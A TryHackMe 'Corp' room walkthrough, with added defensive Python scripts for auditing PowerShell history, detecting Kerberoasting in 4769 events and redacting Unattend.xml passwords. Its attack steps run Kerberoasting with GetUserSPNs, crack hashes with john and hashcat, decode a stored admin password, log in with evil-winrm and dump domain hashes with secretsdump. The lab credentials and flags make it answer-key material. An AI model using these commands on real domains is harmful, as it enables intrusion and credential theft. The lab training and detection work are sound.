Corp TryHackMe Walkthrough

Rich
4 min read · Dec 2, 2023


TL;DR: Walkthrough of the Corp TryHackMe room.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

This was a pretty simple room, but it does serve as a good reminder to look for passwords in things like scripts, config files, text files on users' desktops, command history, Unattended.xml, etc.

Naturally we started with an nmap scan before we even looked at the questions.

sudo nmap -sV -O 10.10.201.224

Then we RDPed as the provided username and password.

xfreerdp /v:10.10.201.224 /u:dark /p:_QuejVudId6 /dynamic-resolution

--- Topic 2 ---

Just like Linux bash, Windows PowerShell saves all previous commands into a file called ConsoleHost_history. This is located at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Access the file and obtain the flag.

# PowerShell does not expand cmd-style %userprofile%; use the $env: form instead
Get-Content $env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

flag{a12a41b5f8111327690f836e9b302f0b}
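The same history file is worth auditing from the defender's side: any password typed on a command line stays in it in plaintext until the file is cleared. The script below is an added example for this walkthrough, not code from the room or the author. It runs a small set of regexes (assumptions about common ways a password lands in history: `/p:`, `net use`, `ConvertTo-SecureString -AsPlainText`, a bare `-p` switch, `password=`) over a constructed history file and reports the line, the command and the secret's length, never the secret itself, so the entries can be cleared and the passwords rotated.

```python
"""Audit a PSReadLine ConsoleHost_history.txt for passwords typed on the
command line. Added example; the history below is constructed and the
patterns are assumptions about common credential-leaking command shapes."""
import os
import re
from pathlib import Path

# Constructed sample of a history file (PSReadLine appends one line per command).
SAMPLE_HISTORY = """\
Get-ChildItem C:\\Users
xfreerdp /v:10.0.0.5 /u:dark /p:SuperSecret1 /dynamic-resolution
net use \\\\fileserver\\share /user:corp\\svc_backup Winter2023!
$pw = ConvertTo-SecureString 'Hunter2' -AsPlainText -Force
Invoke-WebRequest https://example.test/test.ps1 -OutFile test.ps1
evil-winrm -i 10.0.0.5 -u administrator -p 'P@ss w0rd'
Get-Content .\\notes.txt
"""

# (label, regex); the regex's first non-empty group is the secret itself.
CREDENTIAL_PATTERNS = [
    ("xfreerdp /p: switch", re.compile(r"/p:(\S+)")),
    ("net use password argument", re.compile(r"/user:\S+\s+(\S+)")),
    ("ConvertTo-SecureString -AsPlainText", re.compile(r"ConvertTo-SecureString\s+'([^']*)'")),
    ("-p switch", re.compile(r"(?:^|\s)-p\s+(?:'([^']*)'|(\S+))")),
    ("password= assignment", re.compile(r"(?i)pass(?:word)?=(\S+)")),
]


def default_history_path():
    """Location of the file for the current account: the path the walkthrough
    quotes, reached through %APPDATA% (= %USERPROFILE%\\AppData\\Roaming)."""
    base = os.environ.get("APPDATA") or os.path.join(
        os.environ.get("USERPROFILE", "~"), "AppData", "Roaming")
    return (Path(base).expanduser() / "Microsoft" / "Windows" / "PowerShell"
            / "PSReadLine" / "ConsoleHost_history.txt")


def find_credentials(history_text):
    """Return one finding per history line that carries a plaintext secret.
    The secret is not echoed; only its length and the command are reported."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), start=1):
        for label, pattern in CREDENTIAL_PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            secret = next(g for g in match.groups() if g is not None)
            findings.append({
                "line": lineno,
                "kind": label,
                "command": line.split()[0],
                "secret_length": len(secret),
            })
            break  # one finding per line is enough for the report
    return findings


if __name__ == "__main__":
    for f in find_credentials(SAMPLE_HISTORY):
        print(f"line {f['line']:>3}  {f['command']:<24} {f['kind']} ({f['secret_length']} chars)")
```

On a real host, read `default_history_path()` instead of the sample; the patterns are a starting point and will need extending for whatever tooling is common in your environment.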

--- Topic 3 ---

I saw these questions covered Kerberoasting, so I checked my notes and ran a Kerberoast attack using the credentials we were provided.

python3 /home/kali/Downloads/impacket/build/scripts-3.9/GetUserSPNs.py -request corp.local/dark -dc-ip 10.10.201.224 -outputfile /home/kali/Downloads/hashes/CorpRoasted

john /home/kali/Downloads/hashes/CorpRoasted --format=krb5tgs --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt

Alternatively we can crack the hash with hashcat via

hashcat -m 13100 /home/kali/Downloads/hashes/CorpRoasted /home/kali/Downloads/Wordlists/rockyou.txt --force

We get fela \ rubenF124

If anyone is curious, we ran a lab project a while back here:

  • Set up a legacy service account that was Kerberoastable
  • Kerberoasted it with Rubeus and Impacket
  • Cracked the hash with John and Hashcat
  • Showed some common methods to mitigate Kerberoast attacks

Hence the Q&A goes:

Let's first enumerate Windows. If we run setspn -T medin -Q */* we can list all accounts that have an SPN set.

SPN is the Service Principal Name, and is the mapping between service and account.

Running that command, we find an existing SPN. What user is that for?

fela

Let's use hashcat to bruteforce this password. The type of hash we're cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100.

hashcat -m 13100 -a 0 hash.txt wordlist --force

Crack the hash. What is the user's password in plain text?

rubenF124
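What the request above looks like from the domain controller's side is a burst of Kerberos service-ticket requests (event ID 4769) for RC4-encrypted tickets (TicketEncryptionType 0x17, the etype 23 the question mentions) against user accounts that carry an SPN. The script below is an added detection example, not code from the room, the author or any product: it applies that heuristic to constructed 4769 records in JSON-lines form, skipping computer accounts (names ending in `$`) and `krbtgt`, and then looks for one requester pulling tickets for several distinct service accounts inside a short window. The field names follow the 4769 EventData names; the five-minute window and the threshold of three are assumptions.

```python
"""Flag Kerberoast-like TGS requests in Windows event 4769 records.
Added example; events, window and threshold are constructed/assumed."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                     # etype 23, what the tools on this page request by default
SERVICE_ACCOUNT_EXCLUSIONS = {"krbtgt"}
BURST_WINDOW = timedelta(minutes=5)   # assumed
BURST_THRESHOLD = 3                   # distinct user-account SPNs from one requester, assumed

# Constructed sample: JSON lines as a SIEM might export security events.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"time": "2023-12-02T10:00:01", "EventID": 4769, "TargetUserName": "dark@CORP.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"time": "2023-12-02T10:00:02", "EventID": 4769, "TargetUserName": "dark@CORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"time": "2023-12-02T10:00:03", "EventID": 4769, "TargetUserName": "dark@CORP.LOCAL",
     "ServiceName": "fela", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"time": "2023-12-02T10:00:03", "EventID": 4769, "TargetUserName": "dark@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"time": "2023-12-02T10:00:04", "EventID": 4769, "TargetUserName": "dark@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.14.5"},
    {"time": "2023-12-02T11:30:00", "EventID": 4769, "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "fela", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.20.7"},
    {"time": "2023-12-02T11:31:00", "EventID": 4768, "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.20.7"},
])


def parse_events(jsonl):
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def is_user_account_service(name):
    """True for SPNs held by user accounts: not a computer account ($) and not krbtgt."""
    n = name.lower()
    return bool(n) and not n.endswith("$") and n not in SERVICE_ACCOUNT_EXCLUSIONS


def flag_rc4_user_tgs(events):
    """Successful 4769s for RC4 tickets to user-account SPNs: the classic heuristic."""
    return [e for e in events
            if e.get("EventID") == 4769
            and e.get("Status") == "0x0"
            and e.get("TicketEncryptionType") == RC4_HMAC
            and is_user_account_service(e.get("ServiceName", ""))]


def find_bursts(hits, window=BURST_WINDOW, threshold=BURST_THRESHOLD):
    """Requesters that pulled tickets for >= threshold distinct service accounts
    within `window`; bulk requests are the tell, a single one may be legitimate."""
    by_requester = defaultdict(list)
    for e in hits:
        by_requester[e["TargetUserName"]].append(e)
    bursts = {}
    for requester, evs in by_requester.items():
        evs.sort(key=lambda e: e["time"])
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        for i, start in enumerate(times):
            services = {evs[j]["ServiceName"] for j in range(i, len(evs))
                        if times[j] - start <= window}
            if len(services) >= threshold:
                bursts[requester] = sorted(services)
                break
    return bursts


if __name__ == "__main__":
    hits = flag_rc4_user_tgs(parse_events(SAMPLE_EVENTS))
    for requester, services in find_bursts(hits).items():
        print(f"{requester} requested RC4 tickets for {len(services)} service accounts: {services}")
```

The RC4 filter is a strong prior because the tooling on this page asks for etype 23 by default, but a service account restricted to AES still yields a crackable ticket (hashcat has modes 19600/19700 for those), so the burst of distinct service-account requests from one principal is the more durable signal. The usual mitigations are long random passwords or group-managed service accounts for anything with an SPN, plus AES-only settings to remove the cheap RC4 path.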

Login as this user. What is his flag?

We never actually logged in as this user. Instead we skipped ahead, got the Administrator password, logged in as them, and searched for both flags.

#As Administrator
Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String "flag"

flag{bde1642535aa396d2439d86fe54a36e4}

--- Task 4 ---

What is the decoded password?

Get-Content C:\Windows\Panther\Unattend\Unattended.xml

The password stored in that file is base64-encoded. Run it through https://www.base64decode.org/

tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T

Now we have the Administrator's password, login as them and obtain the last flag.

#Remember that we have to escape special characters in BASH with a \ (or wrap the password in single quotes)
evil-winrm -i 10.10.201.224 -u administrator -p tqjJpEX9Qv8ybKI3yHcc\=L\!5e\(\!wW\;\$T

Get-ChildItem
Get-ChildItem ..\Desktop
Get-Content ..\Desktop\flag.txt

THM{g00d_j0b_SYS4DM1n_M4s73R}

Alt:

Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String "THM{"
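A leftover answer file like this one is the kind of thing an image-build review should catch before the image ships. The script below is an added example for this walkthrough, not code from the room or the author: it parses a constructed Unattend.xml, finds every `AdministratorPassword` and `Password` element, decodes the `Value` so the account can be identified and its password rotated, and then redacts the file. The decoding follows the documented Windows Setup convention (base64 of the UTF-16LE string password + element name, e.g. "AdministratorPassword") and falls back to plain base64 of the bare password, which is what the room's file contained; the ASCII-only check used to tell the two apart is an assumption. The redaction marker is the string Windows Setup itself writes when it sanitises sensitive data.

```python
"""Find, decode and redact passwords stored in an Unattend.xml.
Added example; the XML is constructed, the decoding convention is the
documented Windows Setup one, the ASCII heuristic is an assumption."""
import base64
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"
SENSITIVE_TAGS = {"AdministratorPassword", "Password"}
REDACTED = "*SENSITIVE*DATA*DELETED*"


def _win_encode(password, element):
    """How Windows Setup stores a non-plaintext password: base64(UTF-16LE(pw + element))."""
    return base64.b64encode((password + element).encode("utf-16-le")).decode()


# Constructed sample: two accounts stored the documented way, one as bare base64.
SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="{NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>{_win_encode("Winter2023!", "AdministratorPassword")}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts><LocalAccount>
          <Name>deploy</Name>
          <Password><Value>{_win_encode("Deploy#42", "Password")}</Value><PlainText>false</PlainText></Password>
        </LocalAccount></LocalAccounts>
      </UserAccounts>
      <AutoLogon>
        <Username>svc_kiosk</Username>
        <Password><Value>{base64.b64encode(b"KioskOnly1").decode()}</Value><PlainText>false</PlainText></Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # drop the {namespace} prefix


def decode_value(value, element):
    """Return (password, encoding) for a base64 Value of the given element."""
    raw = base64.b64decode(value)
    # Setup writes UTF-16LE; for an ASCII password every odd byte is NUL (assumption: ASCII only).
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text, encoding = raw.decode("utf-16-le"), "utf-16-le"
    else:
        text, encoding = raw.decode("utf-8"), "plain-base64"
    if text.endswith(element):          # strip the element-name suffix Setup appends
        text = text[:-len(element)]
    return text, encoding


def find_passwords(xml_text):
    """One finding per stored password: account, element, encoding, password."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag not in SENSITIVE_TAGS:
            continue
        children = {_local(c.tag): c for c in elem}
        value = children.get("Value")
        if value is None or not value.text:
            continue
        if tag == "AdministratorPassword":
            account = "Administrator"
        else:  # LocalAccount carries <Name>, AutoLogon carries <Username>
            account = next((c.text for c in parent_of[elem] if _local(c.tag) in ("Name", "Username")), "?")
        plain = children.get("PlainText")
        if value.text == REDACTED:
            password, encoding = None, "redacted"
        elif plain is not None and plain.text.strip().lower() == "true":
            password, encoding = value.text, "plaintext"
        else:
            password, encoding = decode_value(value.text, tag)
        findings.append({"account": account, "element": tag, "encoding": encoding, "password": password})
    return findings


def redact(xml_text):
    """Overwrite every stored Value with the marker Setup uses after sanitising."""
    ET.register_namespace("", NS)
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if _local(elem.tag) in SENSITIVE_TAGS:
            for c in elem:
                if _local(c.tag) == "Value":
                    c.text = REDACTED
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for f in find_passwords(SAMPLE_UNATTEND):
        print(f"{f['account']:<14} {f['element']:<22} {f['encoding']:<13} rotate: {f['password']}")
```

The point of decoding rather than just flagging is that the decoded value tells you which accounts on every machine built from the image need a password change; redacting the file alone does not undo that exposure.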

Summary

I was curious and searched for that test.ps1 mentioned in the PowerShell command history back in Task 2, but was unable to find anything named test.ps1 or test under C:\Users.

I ran secretsdump out of curiosity as well.

python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -just-dc Administrator:tqjJpEX9Qv8ybKI3yHcc\=L\!5e\(\!wW\;\$T@10.10.208.240

All in all this was pretty simple, but more practice is always good.

References

Hashcat modes by hash type cheatsheet: https://hashcat.net/wiki/doku.php?id=example_hashes

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.
